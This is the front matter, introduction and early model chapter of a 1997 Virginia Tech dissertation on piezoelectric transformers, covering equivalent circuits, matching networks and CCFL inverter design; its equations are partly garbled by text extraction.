Sunteți pe pagina 1din 208 Design and Analysis of Piezoelectric Transformer Converters Chih-yi Lin Dissertation submitted to the Faculty of theVirginia Polytechnic Institute and State University in partial fulfillment of the requirements for the degree of Doctor of Philosophy in Electrical Engineering Fred C. Lee, Chair Milan M. Jovanovic Dan Y. Chen Dusan Borojevic David Gao July 15,1997 Blacksburg, Virginia Keywords: Piezoelectric, dc/dc converters, Transformers Copyright Chih-yi Lin, 1997 ii Design and Analysis of Piezoelectric Transformer Converters by Chih-yi Lin Fred C. Lee, Chairman Electrical Engineering (ABSTRACT) Piezoelectric ceramics are characterized as smart materials and have been widely used in the area of actuators and sensors. The principle operation of a piezoelectric transformer (PT) is a combined function of actuators and sensors so that energy can be transformed from electrical form to electrical form via mechanical vibration. Since PTs behave as band-pass filters, it is particularly important to control their gains as transformers and to operate them efficiently as power-transferring components. In order to incorporate a PT into amplifier design and to match it to the linear or nonlinear loads, suitable electrical equivalent circuits are required for the frequency range of interest. The study of the accuracy of PT models is carried out and verified from several points of view, including input impedance, voltage gain, and efficiency. From the characteristics of the PTs, it follows that the efficiency of the PTs is a strong function of load and frequency. Because of the big intrinsic capacitors, adding inductive loads to the PTs is essential to obtain a satisfactory efficiency for the PTs and amplifiers. Power-flow method is studied and modified to obtain the maximum efficiency of the converter. The algorithm for designing a PT converter or inverter is to calculate the optimal load termination, Y OPT , of the PT first so that the efficiency (power gain) of the PT is maximized. And then the efficiency of the dc/ac inverter is optimized according to the input impedance, Z IN , of the PT with an optimal load termination. Because the PTs are low-power devices, the general requirements for the applications of the PTs include low-power, low cost, and high efficiency. It is important to reduce the number of inductive components and switches in amplifier or dc/ac inverter designs for PT applications. High-voltage piezoelectric transformers have been adopted by power electronic engineers and researchers worldwide. A complete inverter with HVPT for CCFL or neon lamps was built, and the experimental results are presented. However, design issues such as packaging, thermal effects, amplifier circuits, control methods, and matching between amplifiers and loads need to be explored further. iii Acknowledgments I would like to thank my advisor, Dr. Fred C. Lee, for his support and guidance during the course of this research work. Without his constant correction on my research attitude, I would have never accomplish this work. I would like to express my boundless gratitude to my beloved wife, Kuang-Fen, for her patience over these six years and for taking care of Michael, Serena, and myself in spite of her illness in the past three years. She is the real fighter and hero behind this path of studying abroad. Thanks are also due my parents, brother, and sisters. I also wish to thank Mr. T. Zaitsu and Y. Sasaki of NEC for their helpful discussions, suggestions, and preparing PT samples. Special thanks to all VPEC students, secretaries, and staffs for their help during my stay. Finally, I would like to thank Motorola for their support in developing PT converters, and thank NEC, Tokin, and Delta Electronics Inc. for their providing PT samples or HVPT CCFL inverters. iv Table of Contents 1. Introduction 1 1.1 BACKGROUND 1 1.1.1 Operational Principles 1 1.1.2 Electromechanical Coupling Coefficients 1 1.1.3 Physical Structure of the PTs 4 1.1.4 Material Properties 4 1.2 MOTIVATION 4 1.3 OBJECTIVE OF THE RESEARCH AND METHOD OF APPROACH 7 1.4 DISSERTATION OUTLINE AND MAJOR RESULTS 7 2. Verifications of Models for Piezoelectric Transformers 9 2.1 INTRODUCTION 9 2.2 ELECTRICAL EQUIVALENT CIRCUIT OF THE PT 9 2.2.1 Longitudinal Mode PT 11 2.2.2 Thickness Extensional Mode PT 15 2.3 MEASUREMENT OF ELECTRICAL EQUIVALENT CIRCUIT OF THE PT 19 2.3.1 Characteristics of the PT 19 2.3.2 Admittance Circle Measurements 19 v 2.3.3 Dielectric loss 25 2.4 COMPLETE MODEL OF THE SAMPLE PTS 26 2.4.1 Longitudinal Mode PT : HVPT-2 26 2.4.1.1 Complete Model of HVPT-2 26 2.4.1.2 Experimental Verifications 29 2.4.2 Thickness Extensional Mode PT :LVPT-21 30 2.4.2.1 Two-Port Network Representation of LVPT-21 30 2.4.2.2 Complete Model of LVPT-21 30 2.4.2.3 Experimental Verifications 31 2.5 SUMMARY AND CONCLUSION 36 3. Design of Matching Networks 37 3.1 INTRODUCTION 37 3.2 OUTPUT MATCHING NETWORKS 38 3.2.1 Power Flow Method 38 3.2.1.1 Input Power Plane 40 3.2.1.2 Output Power Plane 41 3.2.1.3 Maximal Efficiency 42 3.2.2 Adjustment of the Power Flow Method for PTs 46 3.2.3 Optimal Load Characteristics 49 3.2.3.1 Thickness Extensional Mode PT with Power-Flow Method (LVPT-21) 49 3.2.3.2 Longitudinal Mode PT with Power-Flow Method (HVPT-2) 53 3.2.3.3 Optimal Resistive Load for Longitudinal Mode PT 53 3.2.3.4 Optimal Resistive Load for Longitudinal Mode PT Derived in L-M plane 59 3.2.4 Equivalent Circuit of Output Rectifier Circuits and Loads 61 3.2.5 Design of Output Matching Networks 68 3.3 INPUT MATCHING NETWORKS 70 3.3.1 Input Impedance Characteristics of the PT 71 3.3.1.1 Thickness Extensional Mode PT (LVPT-21) 71 vi 3.3.1.2 Longitudinal Mode PT (HVPT-2) 75 3.3.2 Study of Output Impedance for Amplifiers 75 3.4 SUMMARY 75 4. Design Tradeoffs and Performance Evaluations of Power Amplifiers 76 4.1 INTRODUCTION 76 4.2 HALF-BRIDGE PT CONVERTERS 77 4.2.1 Operational Principles of Half-Bridge Amplifiers 77 4.2.2 Equivalent Circuit for Half-Bridge PT Converters 77 4.2.3 DC Characteristics and Experimental Verifications 80 4.2.4 Design Guidelines and Experimental Results 84 4.3 SINGLE-ENDED MULTI-RESONANT PT CONVERTERS 86 4.3.1 Operational Principles of SE-MR Amplifiers 86 4.3.2 Equivalent Circuit for SE-MR PT converters 88 4.3.3 DC Characteristics 89 4.3.4 Design Guidelines and Experimental Results 89 4.4 SINGLE-ENDED QUASI-RESONANT CONVERTERS 94 4.4.1 Operational Principles of SE-QR Amplifiers 94 4.4.1.1 SE-QR Amplifiers 94 4.4.1.2 Flyback SE-QR Amplifiers 94 4.4.2 Equivalent Circuit for SE-QR PT Converters 97 4.4.3 DC Analysis of SE-QR Amplifiers 99 4.4.3.1 SE-QR Amplifiers 99 4.4.3.2 Flyback SE-QR Amplifiers 102 4.4.4 DC Characteristics and Experimental Verifications 102 4.4.4.1 DC Characteristics 102 4.4.4.2 Experimental Verifications 102 vii 4.4.5 Design Guidelines 107 4.4.6 Conclusions 107 4.5 PERFORMANCE COMPARISON OF LVPT CONVERTERS 107 4.6 SUMMARY 110 5. Applications High-Voltage of Piezoelectric Transformers 111 5.1 INTRODUCTION 112 5.2 CHARACTERISTICS OF THE HVPT 115 5.3 CHARACTERISTICS OF THE CCFL AND NEON LAMPS 115 5.3.1 Characteristics of the CCFL 115 5.3.2 Characteristics of Neon Lamps 116 5.4 DESIGN EXAMPLES OF FLYBACK SE-QR HVPT INVERTERS 117 5.4.1 Flyback SE-QR HVPT Inverters 117 5.4.2 DC Characteristics 118 5.4.3 Design of the Power Stage 118 5.4.4 Experimental Results 121 5.4.4.1 CCFL Inverters 121 5.4.4.2 Neon-Lamp Inverters 121 5.5 BUCK + FLYBACK SE-QR HVPT INVERTERS (THE REFERENCE CIRCUIT) 124 5.5.1 Operation Principles 124 5.5.2 Design of the Power Stage 124 5.6 COMPARISON BETWEEN CONVENTIONAL HV TRANSFORMERS WITH HVPTS 127 5.6.1 Specifications 128 5.6.2 Conventional CCFL Inverters 128 5.6.3 Experimental Results 128 5.7 COMPARISON BETWEEN CONSTANT- AND VARIABLE-FREQUENCY CONTROLLED HVPT CCFL INVERTERS 130 5.7.1 Specifications 130 viii 5.7.2 Two-Leg SE-QR CCFL Inverters 130 5.7.3 Experimental Results 130 5.8 CONCLUSIONS 132 6. Conclusions and Future Works 133 References 136 APPENDIX A: Physical Modeling of the PT 140 A.1 INTRODUCTION 140 A.2 MODEL OF THE LONGITUDINAL MODE PT 140 A.3 MODEL OF THE THICKNESS EXTENSIONAL MODE PT 160 APPENDIX B: MCAD Program to Calculate the Physical Model of PTs 172 APPENDIX C: Derivation of Resonant And Anti-resonant Frequencies 174 APPENDIX D: MCAD Program to Calculate the Equivalent Circuits of PTs 177 APPENDIX E: MATLAB Program to Calculate the Optimal Load of PTs 180 APPENDIX F: MATLAB Program to Calculate the DC Characteristics of SE-QR Amplifiers 186 Vita 192 ix List of Figures Fig. 1.1. Electromechanical coupling coefficients of piezoelectric ceramics 3 Fig. 1.2. Constructions of different PTs 5 Fig. 2.1. Construction of longitudinal PTs 12 Fig. 2.2. Physical model of HVPT-1 and its input admittance characteristics 13 Fig. 2.3. Construction of the thickness extensional mode PT (LVPT-11) 16 Fig. 2.4. Physical model of LVPT-11 and its input admittance characteristics 17 Fig. 2.5. Voltage gain characteristics of the PTs 20 Fig. 2.6. Admittance circle measurements 21 Fig. 2.7. Derivation of parameters of PT model by admittance circle measurement techniques 24 Fig. 2.8. Admittance circle measurement and the electrical equivalent circuit of HVPT-2 27 Fig. 2.9. Voltage gain and efficiency of HVPT-2 28 Fig. 2.10. G-B plot and basic model of LVPT-21 32 Fig. 2.11. Complete model of LVPT-21 and its characteristics 33 Fig. 2.12. Experimental and theoretical voltage gain of LVPT-21 34 Fig. 2.13. Experimental and theoretical efficiency of LVPT-21 35 Fig. 3.1. Complete dc/dc converter with the PT and its matching networks 38 Fig. 3.2. Two-port network representation of PTs and the sampled Y parameters at fs 39 Fig. 3.3. Input power plane in the L-M plane 41 x Fig. 3.4. Output power plane in the L-M plane 43 Fig. 3.5. Efficiency plot in the L-M plane 43 Fig. 3.6. Mapped contours of the input and output planes 44 Fig. 3.7. Side views of the input and output planes on x-axis 47 Fig. 3.8. Adjustment of power-flow method for PTs 48 Fig. 3.9. Characteristics of the LVPT-21 matched by using power-flow method 51 Fig. 3.10. Characteristics of the LVPT-21 matched by using adjusted power-flow method 54 Fig. 3.11. Voltage gains and efficiency of LVPT-21 with matched loads calculated by adjusted power-flow method. 56 Fig. 3.12. Characteristics of matched HVPT-2 57 Fig. 3.13. Optimal termination of the PT under resistive load 58 Fig. 3.14. Optimal resistive load for high-output-impedance PTs 61 Fig. 3.15. Efficiencies of HVPT-2 with various resistive loads 64 Fig. 3.16. Operating waveforms of the half-bridge rectifier stage 66 Fig. 3.17. L-type matching network 69 Fig. 3.18. Input characteristics of LVPT-21 72 Fig. 3.19. Input characteristics of HVPT-2 74 Fig. 4.1. Half-bridge amplifier and its theoretical waveforms 78 Fig. 4.2. Complete half-bridge PT converter and its equivalent circuit 79 Fig. 4.3. DC characteristics of the half-bridge PT converter 81 Fig. 4.4. Output voltage of the half-bridge PT converter 82 Fig. 4.5. Efficiencies and output voltage of the half-bridge PT converter 83 Fig. 4.6. Design example of the half-bridge PT converter 85 Fig. 4.7. Efficiencies of the half-bridge PT converter 86 Fig. 4.8. Single-ended multi-resonant (SE-MR) amplifiers 87 Fig. 4.9. SE-MR PT converter and its equivalent circuit 88 Fig. 4.10. Normalized voltage gain and voltage stress of SE-MR amplifiers 90 Fig. 4.11. Design example of the SE-MR PT converter 93 xi Fig. 4.12. Single-ended quasi-resonant (SE-QR) amplifier 95 Fig. 4.13. Flyback SE-QR amplifier 96 Fig. 4.14. SE-QR PT converter and its equivalent circuit 98 Fig. 4.15. Normalized switch voltage waveforms of the flyback SE-QR amplifier 100 Fig. 4.16. Normalized switch voltage and current stress of the flyback SE-QR amplifier 101 Fig. 4.17. Flow chart used to calculate the normalized voltage and current waveforms of the SE-QR amplifier 103 Fig. 4.18. Voltage gain and maximum voltage stress of SE-QR LVPT converter 104 Fig. 4.19. Experimental verification on SE-QR LVPT converter 105 Fig. 4.20. Experimental waveforms of SE-QR LVPT converter with different values of R L 106 Fig. 4.21. Efficiency comparison of three LVPT converters 108 Fig. 5.1. Theoretical voltage gain and efficiency of HVPT-2. 113 Fig. 5.2. Gain characteristics and control methods of HVPT-2 114 Fig. 5.3. Characteristics of the experimental CCFL and neon lamps. 116 Fig. 5.4. Experimental flyback SE-QR CCFL inverter and its DC characteristics 117 Fig. 5.5. DC characteristics of flyback SE-QR HVPT inverters when Rload = 105 k 119 Fig. 5.6. DC characteristics of flyback SE-QR HVPT inverters when Rload = 209 k 120 Fig. 5.7. Experimental flyback SE-QR HVPT inverters and its experimental verifications 122 Fig. 5.8. Experimental waveforms of flyback SE-QR HVPT inverters 123 Fig. 5.9. Buck + flyback single-ended quasi-resonant (SE-QR) amplifiers 125 Fig. 5.10. Complete flyback SE-QR HVPT inverters : the reference circuit 126 Fig. 5.11. Efficiency of experimental CCFL HVPT inverters (reference circuits) 127 Fig. 5.12. Efficiency comparisons between conventional CCFL inverter and the xii reference circuit 129 Fig. 5.13. Two-leg SE-QR HVPT CCFL inverter and its experimental results 131 Fig. A.1. Components of the longitudinal PT 141 Fig. A.2. Three port network for the side-plated bar 147 Fig. A.3. Basic model for the side-plated bar 148 Fig. A.4. Basic model for the end-plated bar 153 Fig. A.5. Construction of longitudinal PTs 155 Fig. A.6. Model and definition of dimensional variables of a longitudinal PT 158 Fig. A.7. Lumped model of the longitudinal PT. 159 Fig. A.8. 1:1 broad-plated PT 161 Fig. A.9. Basic model cell of the broad plate piezoceramic 166 Fig A.10. Construction of the thickness vibration PT 169 Fig. A.11. Lumped model of the thickness vibration PT around fs 170 Fig. A.12. Final Lumped model of an 1:1 thickness vibration PT around fs 171 xiii List of Tables Table 2.1. Material constants for HVPT-1 10 Table 2.2. Dimensions of HVPT-1 10 Table 2.3. Material constants for LVPT-11 15 Table 2.4. Dimensions of LVPT-11 15 Table 3.1. Output rectifier stage 67 Table 4.1. Calculated parameters for the SE-MR LVPT converter at Fs = 1.96 MHz 92 Table 4.2. Comparison of three LVPT converters employing half-bridge, SE-MR, and the SE-QR Amplifier topologies 109 xiv Nomenclature Roman Items A Area in cm 2 B Susceptance C Capacitance in the mechanical branch of the PT c Elastic stiffness constant Cd1 Input capacitance of the PT Cd2 Output capacitance of the PT d Piezoelectric constant D (superscript) At constant electric displacement D Electric displacement E Electric field E (superscript) At constant electric field e Piezoelectric constants F Force F S Switching frequency in Hz fn Normalized switching frequency f +45 Frequency at +45 o from the origin in admittance plot f -45 Frequency at -45 o from the origin in admittance plot fa Antiresonance frequency, susceptance = 0 fr Resonant frequency, susceptance = 0 xv fm Frequency at maximum admittance fn Frequency at minimum admittance fp Parallel-resonance frequency fs Series-resonance frequency G Conductance in 1/ g Piezoelectric constant h Piezoelectric constant k Electromechanical coupling coefficient L Inductance in the mechanical branch of the PT l Length in cm N Turns ratio of a transformer; 1:N n Normalization of circuit parameters Qm Quality factor of the mechanical branch R Resistance in the mechanical branch of the PT S Strain s Elastic compliance constant S (superscript) At constant strain T Stress T (superscript) At constant stress T S Switching period in seconds t Time in second u Displacement V Voltage v Velocity W Width or energy X Electric circuit reactance x 1 , x 2 , x 3 Cartesian coordinate axis Y Electric circuit admittance xvi Y Youngs modules Z Electric circuit impedance R L load resistance of the rectifier circuit Rload load resistance of the PT Special groups $ x x in phasor representation $ X X in phasor representation x n Normalized representation of x X n Normalized representation of X X OPT Optimized value for X to achieve best efficiency of the PT Greek items Impermittivity component 0 Permittivity of free space Permittivity component Angle Angular frequency ( 2f ) in rad/sec Infinitively small value Mass density Efficiency Turns ratio of the PT Wavelength 1 1. Introduction 1.1 Background 1.1.1 Operational Principles Piezoelectric ceramics are characterized as smart materials and have been widely used in the area of actuators and sensors. The operation principle of a piezoelectric transformer (PT) is a combined function of actuators and sensors so that energy can be transformed from electrical form to electrical form via mechanical vibration. In the beginning stages of developing the PT, it was used as a high-voltage transformer [1]. Continuous efforts devoted to these subjects have been carried out by many researchers [2-8]; however, the published applications are quite limited [9-23]. The piezoelectric effects are considered to be the result of linear interaction between electrical and mechanical systems. For example, the stress of a PT is linearly dependent on the strain. In this work, only the linear piezoelectric effects of the PTs will be dealt with. The nonlinear effects due to temperature rise, depolarization, and aging are out of the scope of this study and will be discussed only briefly. 1.1.2 Electromechanical Coupling Coefficients The piezoelectric effect will not be activated until the material is polarized in a specified direction or several directions. The measurement of the coupling between the electrical energy and the mechanical energy is called electromechanical coupling coefficient and is defined as k mechanical energy converted from input electrical energy input electrical energy 2 , or 2 k electrical energy converted from input mechanical energy input mechanical energy 2 (1.1) Therefore, the value of the electromechanical coupling coefficient does not indicate the efficiency of the piezoceramics. The energy, which is not converted from input energy, is simply stored in the intrinsic capacitor or in the mechanical branch of the piezoceramics or the PTs. The best illustration of this constant is described in [7]. For example, one of the linear piezoelectric equations describing a longitudinal vibration PT in the transverse direction is S s T d E D d T E E T 1 11 1 31 3 1 31 1 33 3 + + (1.2) Figure 1. 1 (a) shows a compressive stress applied along x 1 direction when electric field in x 3 direction is zero; the electrodes are then shorted. When T 1 equals T m , electrical terminals are opened. At the instant when T 1 is reduced to zero, an electric load is added to the electrodes. Hence, W 1 +W 2 represents the input mechanical energy, and W 1 represents the output electrical energy. Therefore, the coupling coefficient is k W W W s s s E D E 2 1 1 2 11 11 11 + , (1.3) and s s k D E 11 11 2 1 ( ) . (1.4) From (1.2), if D 1 = 0, s 11 D is s s d s D E T E 11 11 31 2 33 11 1 _ , . (1.5) From (1.4) and (1.5), k d s T E 2 31 2 33 11 . (1.6) The coupling coefficient can be obtained by calculating the energy conversion from electrical to mechanical energy in Fig. 1.1 (b). The input energy changes to a voltage source, and the piezoceramic is free of expansion or contraction. During this interval, the electric displacement, D 3 , increases by a slope, 33 T . When E 1 = E m , the body of the piezoceramic is clamped and voltage source is removed. Meanwhile, the displacement D 3 decreases by a slope, 33 D . By a similar derivation, 33 33 2 1 S T k ( ) (1.7) 3 -S d T 31 2 33 s E 11 k W W W 2 1 1 2 + (a) - T ( compressive stress ) W T dS 2 D 0 slope = s E 11 slope = s D 11 (-Tm , -Sm) 1 1 k W W W 2 1 1 2 + (b) W 1 W E dD 2 S 0 slope = T 33 slope = (Em , Dm) E 3 S 33 D 3 W 1 Fig. 1.1. Electromechanical coupling coefficients of piezoelectric ceramics. W1+W2 denotes the input mechanical energy or input electrical energy in (a) and (b) respectively. W 1 represents the output electrical or mechanical energy. The electromechanical coupling coefficient is not necessary a measurement of efficiency of the PT. 4 1.1.3 Physical Structure of the PTs PTs can be classified into different categories based on their vibration modes or operating frequencies [5]. It is simpler to classify them from one anther by their vibration modes as the longitudinal vibration mode PT, and the thickness vibration mode PT. For example, for the longitudinal vibration mode PTs, the vibration occurs along the direction shown in Fig. 1.2 (a). Therefore, the longer the PT, the lower the operating frequency. Usually this type of PT is called the rosen-type PT or the high-voltage PT (HVPT) and its main function is to step up the source voltage. Figure 1.2 (b) shows the thickness vibration mode PT, which is suitable for high- frequency and step-down operations and is called the low-voltage PT (LVPT). They are very different in appearance because they operate at distinct frequency bands. The resonant frequency of HVPT is below several hundred kHz because the step-up ratio depends on its physical size [10]. The longer it is, larger the step-up ratio, but the resonant frequency is reduced accordingly. The LVPT, operated in the thickness extensional vibration mode [16,17], has aresonance frequency of several MHz for very thin layers. 1.1.4 Material Properties The materials used for PTs includes Lead zirconate titanate PZT series, Lead titanate, PbTiO 3 , and Lithium niobate, LiNbO 3 . Most of the high-voltage PTs are made of PZT material. The newly developed thickness extensional mode PT is made of PbTiO 3 and is very efficient at high frequencies [16, 24-26]. Because of the difficulty in supporting the thickness extensional mode PT, the PT with width-shear vibration was proposed by [27]. It is made from LiNbO 3 , known as one of the surface-acoustic-wave (SAW) devices. 1.2 Motivation In the power electronic industry, miniaturization of power supplies has been an important issue during the last decade. The transformers and inductors of the converters are usually tall and bulky compared to transistors and ICs. The low-profile transformers [28] are integrated into the PCB board to reduce the height and size of the converters. The PTs have several inherent advantages over conventional low-profile transformers, such as very low profile, no winding, suitability for automated manufacturing, high degree of insulation, and low cost. Besides the inherent merits of the PTs, they are especially suitable for low-power, high-voltage applications, where making and testing the high-voltage transformers is laborious. Recently, several kinds of PTs, operating at several MHz, have been proposed [16,17]. The output power density is around 20 Watts/cm 3 , which is similar to that of the high-frequency ferrite transformers. The PTs are definitely promising components for low-power applications. For higher power operations, it is necessary to reduce the mechanical loss of the PTs. Increasing the number of interdigit fingers in [27] could be one way to reduce the mechanical loss. 5 c k Qm Length Thickness VO VIN 2 P P VIN VO (b) = d1 d2 5:1 VO VIN P P P P P P R L d1 d2 V O V IN (a) Fig. 1.2. Construction of different PTs. (a) longitudinal mode PT. (b) multi-layer thickness extensional mode PT provided by NEC. 6 HVPTs are especially attractive for compact, high-voltage, low-power applications, such as backlit power supplies of notebook computers and neon-light power supplies for warning signs. Presently, the HVPT power supply for cold-fluorescent lamps used in backlighting the screen of notebook computers is already commercialized, and its output voltage is around 1 kV(rms), with 3 to 6-watts output power. LVPTs are developed for on-board power supplies [17,21] with a 48- V input and a 5-V output. The efficiency of the LVPT in an experimental circuit [22] is 92 %. Apparently, the overall efficiency of the PT converter cannot compete with that of the commercial power supplies with the same specifications as above. The PTs are still very attractive because of all the merits mentioned earlier. Another applicable utilization of LVPTs will be the AC adapters whose weight and volume need to be minimized. If a LVPT is designed with a large step-down ratio, 10:1, it would be possible to build an AC adapter. According to the charge pump concept stated in [29], an AC adapter with PFC circuit using LVPT can be implemented by a simple topology [22]. While studying modeling, matching, and applications of the piezoelectric transformer, a good model of the PT can help designers gain better physical insight and to develop the converter circuit with the PTs via simulation. The development of the models of the PTs can be achieved by measurement or theoretical derivation, and they serve different purposes. Measurement results of the PTs from the impedance analyzer can help calculate the parameters of the lumped models according to an ideal resonant band-pass circuitry [30-38] . As far as designing a desired PT is concerned, a physical model [3-5] is essential so that the parameters of the model can be determined from the properties of the material and the physical size of the PT. Operational principles of the PTs are related to electromechanical effects and are explained by the wave motion in a body. A mathematical model can be obtained from the analytical solutions by solving the wave equations. The efficiencies of the LVPTs and HVPTs are both above 90%, and they can be maximized when the load is optimized. HVPT has a very small output intrinsic capacitor, and its optimal load can be a resistive load that equals the output capacitive impedance [17,21]. On the contrary, the output capacitor of the LVPT is large, and the optimal load, which is optimized by the power- flow algorithm [40,41], is inductive. Once the optimal load of a particular PT is specified, it is necessary to add a matching network between the PT and the rectifier circuits of the converters. Some sophisticated power-amplifier circuits, demonstrated in [22, 42-45], provide a good way to increase the efficiency of PT converters; however, those circuits are too complicated to use in low-power PT applications. A study of a simple, single-ended quasi-resonant amplifier is conducted by simulation, and then the DC characteristics and design guidelines are presented. Finally, two experimental circuits for LVPT and HVPT applications are built. 7 1.3 Objective of the Research and Method of Approach The need to utilize PTs efficiently has motivated the following studies: 1) Study the materials of the PTs to achieve high efficiency in either high or low frequencies, and study the electromagnetic coupling effect as well as wave theory. These are the fundamental tools to establish the mathematical analytical equations for the PTs. Accordingly, the physical models and the nodes, which refer to the support points, can be determined. 2) Derive and verify the electrical equivalent circuits of the PTs. The basic models of the PTs are derived from the measurement results of the impedance analyzer by employing the admittance- circle technique. The dielectric loss of the PTs is incorporated into the basic models by using the curve-fitting method to fit the measurement results obtained from the network analyzer. In order to design the desired PTs, the physical models of the PTs are derived from linear piezoelectric equations and the electromechanical theory. This study will help designers to gain better physical insight and to develop the circuit via simulation. 3) Develop methods to determine the optimal loads for different PTs ( LVPT or HVPT ). For the PT with very high output impedance, its optimal load is resistive. On the other hand, for the low output-impedance PT, its optimal load needs to be determined by the power-flow method, and the best efficiency of the PT is determined over a certain frequency range. For the given specifications of the PT dc/dc converter, the rectifier circuit and the load can be represented as an equivalent resistive load. As a result, a matching network needs to be added between the output of the PT and the rectifier circuit. In the meantime, it is necessary to study the interaction between the amplifiers and the input impedance of the PT. 4) Analyze and build power amplifiers as the input source of the PTs. Two breadboard circuits employing the LVPT or HVPT respectively were built to demonstrate the feasibility of using the PT as a power-transformation media. 1.4 Dissertation Outline and Major Results This dissertation includes six chapters, references and appendices. In Chapter 2, the lumped models for both longitudinal and thickness extension mode PTs are verified with empirical measurements from the impedance analyzer or network analyzers. The resultant lumped models of the PTs can help designers to understand the characteristics of the PTs and to design PT inverters via simulations. Verification of parameters for lumped models of PTs is fulfilled from several aspects, including input admittance, voltage gain, and efficiency, all under various load conditions. The measured performance of the PT agrees with those obtained from lumped model by simulation. 8 In Chapter 3, the matching networks for the PTs are obtained to maximize the efficiency of the PTs. Output matching network is decided by performing the power flow method, which provides a graphical way to calculate the optimal load of the PTs. The objective of designing the input matching network is to match the input impedance of a matched PT, whose load is optimized to achieve maximum efficiency, to the amplifier circuit. Moreover, matching between the amplifier and the input impedance of the PTs results in reducing the circulation current flowing in PTs and amplifiers. Chapter 4 provides different power amplifier circuits for low-voltage ( or step-down) and high-voltage ( or step-up) applications. The design example is a dc/dc converter and it is performed by employing a step-down PT. The performance comparisons between simplicity and efficiency of the converter circuits are summarized. In Chapter 5, applications for Cold-Cathode-Fluorescent-Lamp (CCFL) are chosen, and the PTs are used as the key components to replace the conventional transformer to demonstrate their values in the real word. Conclusions and future work are presented in Chapter 6. 9 2. Verifications of Models for Piezoelectric Transformers 2.1 Introduction Since the PTs behaves as band-pass filters, as shown by their gain vs. voltage gain characteristics, it is particularly important to control their gains as transformers and to operate them efficiently as power-transferring components. In order to incorporate a PT into amplifier design and to match it to the linear or nonlinear loads, suitable electrical equivalent circuits are required for the frequency range of interest. In this chapter, the study of the accuracy of PT models is carried out from several points of view, including input impedance, voltage gain, and efficiency when PTs are connected to the resistive loads directly. Those characteristics will be utilized in designing the converters employing PTs. Intuitively, the PTs should be operated around their resonant frequencies so that both efficiency and voltage gain can be maximized. However, the operating frequencies are selected a little away from their resonant frequencies for control reasons. 2.2 Electrical equivalent circuit of the PTs The analysis of piezoelectric transformers has been carried out by employing one dimensional wave equations. Accordingly, the mechanical and electrical properties can be derived in a straightforward manner. In order to study their interaction, it is preferable to use the equivalent circuit approach. Meanwhile, mechanical parameters can be replaced by their electric counterparts. Around the 1950s, the piezoelectric transformers had just emerged, and their equivalent circuits had been derived in [3-5] in the forms of different basic model cells. Only the complete model of the longitudinal mode has been described completely [3,4]. Nowadays, the thickness extensional mode multilayer PTs [16] are adopted to enhance the performance of the PTs, for example to increase the gain of the PTs and to improve their power handling. To deal with these multilayer PTs, correct mechanical and electrical boundary conditions have to be created to obtain meaningful equivalent circuits. 10 Table 2.1. Material constants for HVPT-1. Constant Description Value 33 T Relative permittivity 1200 tan Dielectric tangent (%) 0.5 k 31 Electromechanical constant 0.35 k 33 Electromechanical constant 0.69 Y 11 E Youngs modulus (10 10 N/m) 8.5 Y 33 E Youngs modulus (10 10 N/m) 7 d 31 Piezoelectric constant (10 -12 m/N) -122 d 33 Piezoelectric constant (10 -12 m/N) 273 g 31 Piezoelectric constant (10 -3 Vm/N) -11.3 g 33 Piezoelectric constant (10 -3 Vm/N) 25.5 Qm Mechanical quality constant 2000 Density (kg/m 3 ) 7800 Table 2.2. Dimensions of HVPT-1. Variable Description Value 2 l Length of the PT (mm) 33 W Width of the PT (mm) 5 h Thickness of the PT (mm) 1 l S Length of the side-plated bar l E Length of the side-plated bar 11 Two types of PTs will be studied in this chapter, longitudinal mode PTs and thickness extensional mode PTs. The physical model of the longitudinal PT has been discussed extensively in [3,4] and will be repeated in Appendix A for completion. Applying the one dimensional wave equations, the model with the mechanical for a 1:1 thickness extensional mode PT is also studied in Appendix A. The complete electrical equivalent circuits for both longitudinal and thickness extensional PTs are summarized and the results are given in the following sections. 2.2.1 Longitudinal mode PT Figure 2.1. shows the construction of a longitudinal PT and its electrical equivalent circuit which is constructed of two basic model cells: the side-plated bar and the end-plated bar. The side-plated bar is the driver part of the PT, where the electrical input is converted to mechanical vibration in x 1 direction due to the strong piezoelectric coupling. In the meantime, the mechanical vibration which appearing at both ends of the end-plated bar is restored to electrical energy, and the detailed derivation of the basic model cells of the longitudinal model PT is presented in Appendix A. Figure 2.2. shows the resultant model for a longitudinal mode PT around its second mode or full-wave mode operation. The parameters of the final model are calculated according to the information tabulated in Table 2.1. This sample is named HVPT-1, and is manufactured by Panasonic in Japan. The equations used to calculate the parameters of the electrical equivalent circuit can be obtained from Appendix A and are summarized below: L Aac L o l s 4 2 2 2 ' ' ; (2.1) C W h Y E ' 2 2 1 4 l S ; (2.2) R Z Q o m 4 2 ' ; (2.3) Cd W k h T o 1 1 33 31 2 l s ( ) ; (2.4) Cd W h k T o 2 1 33 33 2 ( ) l e ; (2.5) N ' ; (2.6) ' W d Y E 31 11 ; (2.7) 12 End-plated bar Side-plated bar Ein Eout Ein Cd1 1 : Z' 1 Z' 1 Z' 2 Iin ' Cd2 : 1 Z 1 Z 2 Z 1 Iout Electrical equivalent circuit of side-plated bar Electrical equivalent circuit of end-plated bar (a) (b) (c) L o Fig. 2. 1. Construction of longitudinal PTs. (a) nonisolated type. (b) side-plated bar and end- plated bar. (c) their equivalent circuits. The electrode, near the driver portion of the side-plated bar is either shared with one of the electrodes of the driver or appears on the surface of the output part. This arrangement will affect the efficiency of the longitudinal mode PT slightly. The support points at nodes also affect the efficiency of PTs. Co' and Co are the intrinsic capacitors of the bars. The networks composed of Z' and Z represent the mechanical branches in the models. The interaction between electrical and mechanical networks are explained by the transformer ratios: and ', which are proportional to the piezoelectric constants. 13 Vo Cd2 1 : N Vin Cd1 R L C L = 61.51 mH C = 36.4 pF R = 19 Cd1 = 754 pF Cd2 = 2.4 pF N = 12 (a) (b) 96 98 100 102 104 106 0 0.01 0.02 0.03 0.04 0.05 Yin Vo = 0 Frequency (kHz) Physical model in (a) Measured from HP 4194 Fig. 2. 2. Physical model of HVPT-1 and its input admittance characteristics. R, L, and C are calculated by using its dimensions and material constants from Table 2.1. The measured input admittance is shown in dark line and the calculated input admittance in thin line. Both curves are drawn when output terminals are shorted. Because there is no spurious vibrations around the resonant frequency from the measurement results. The parameters of the model depicted in (a) can be easily tuned to obtain the same measured characteristics. This model is valid for the PT without any spurious vibration near the resonant frequency. 14 Z Y h W o D 33 ; (2.8) + h W g Y g Y D T D l E 33 33 33 33 2 331 ; (2.9) L Cd o o 1 2 2 ; (2.10) and the dielectric losses can be estimated as Rcd Cd o 1 1 1 tan , (2.11.a) Rcd Cd o 2 1 2 tan . (2.11.b) l S is the length of the side-plated bar and l E is that of the 